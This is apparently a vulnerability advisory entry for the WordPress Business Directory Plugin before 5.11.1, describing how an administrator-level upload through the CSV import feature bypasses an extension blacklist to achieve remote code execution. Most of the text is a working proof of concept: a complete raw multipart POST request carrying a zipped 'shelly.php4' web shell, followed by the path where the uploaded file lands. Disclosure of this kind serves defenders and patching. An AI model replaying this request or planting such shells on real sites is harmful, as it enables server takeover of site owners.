Business Directory Plugin < 5.11.1 - Authenticated PHP4 Upload to RCE
Description
The plugin did not properly check for imported files, forbidding certain extension via a blacklist approach, allowing administrator to import an archive with a .php4 inside for example, leading to RCE
Proof of Concept
Create a php4 file with PHP code in it, zip it and import it via the plugin import feature (wp-admin/admin.php?page=wpbdp_admin_csv)
POST http://localhost/wp-admin/admin.php?page=wpbdp_admin_csv HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: multipart/form-data; boundary=---------------------------31004249213982265192075330464
Content-Length: 2653
-----------------------------31004249213982265192075330464
Content-Disposition: form-data; name="action"
do-import
-----------------------------31004249213982265192075330464
Content-Disposition: form-data; name="csv-file"; filename="Shop search - 1613143091.csv"
Content-Type: application/vnd.ms-excel
stuff,more stuff
-----------------------------31004249213982265192075330464
Content-Disposition: form-data; name="images-file"; filename="test.zip"
Content-Type: application/x-zip-compressed
PK {UR$ó˜SU q
shelly.php4³±/È(PÈLÓÈ,.N-ÑP‰r
u
‰VOÎMQÕÔ¬VHMÎÈWP²)(JµS²VPŠ+Ø*`ª´V(®,.IÍÕ ©Ð´†iÓ‡êKÉLµV¨µ· PK {UR$ó˜SU q
$ shelly.php4
#É€×#ɀ׉"=_×PK \ }
-----------------------------31004249213982265192075330464
Content-Disposition: form-data; name="settings[csv-file-separator]"
,
-----------------------------31004249213982265192075330464
Content-Disposition: form-data; name="settings[images-separator]"
;
-----------------------------31004249213982265192075330464
Content-Disposition: form-data; name="settings[category-separator]"
;
-----------------------------31004249213982265192075330464
Content-Disposition: form-data; name="settings[post-status]"
publish
-----------------------------31004249213982265192075330464
Content-Disposition: form-data; name="settings[existing-post-status]"
preserve_status
-----------------------------31004249213982265192075330464
Content-Disposition: form-data; name="settings[create-missing-categories]"
1
-----------------------------31004249213982265192075330464
Content-Disposition: form-data; name="settings[append-images]"
1
-----------------------------31004249213982265192075330464
Content-Disposition: form-data; name="settings[assign-listings-to-user]"
1
-----------------------------31004249213982265192075330464
Content-Disposition: form-data; name="settings[default-user]"
1
-----------------------------31004249213982265192075330464
Content-Disposition: form-data; name="settings[batch-size]"
40
-----------------------------31004249213982265192075330464
Content-Disposition: form-data; name="settings[disable-email-notifications]"
1
-----------------------------31004249213982265192075330464
Content-Disposition: form-data; name="do-import"
Import Listings
-----------------------------31004249213982265192075330464--
Upload Path: wp-content/uploads/wpbdp-csv-imports/{last modified}/images/shelly.php4 Affects Plugins
Fixed in version 5.11.1✓
References
Classification
Type
UPLOAD
CWE
Miscellaneous
Original Researcher
0xB9
Submitter
0xB9
Submitter twitter
Verified
Yes
Timeline
Publicly Published
2021-04-11 (about 3 months ago)
Added
2021-04-12 (about 3 months ago)
Last Updated
2021-04-14 (about 3 months ago)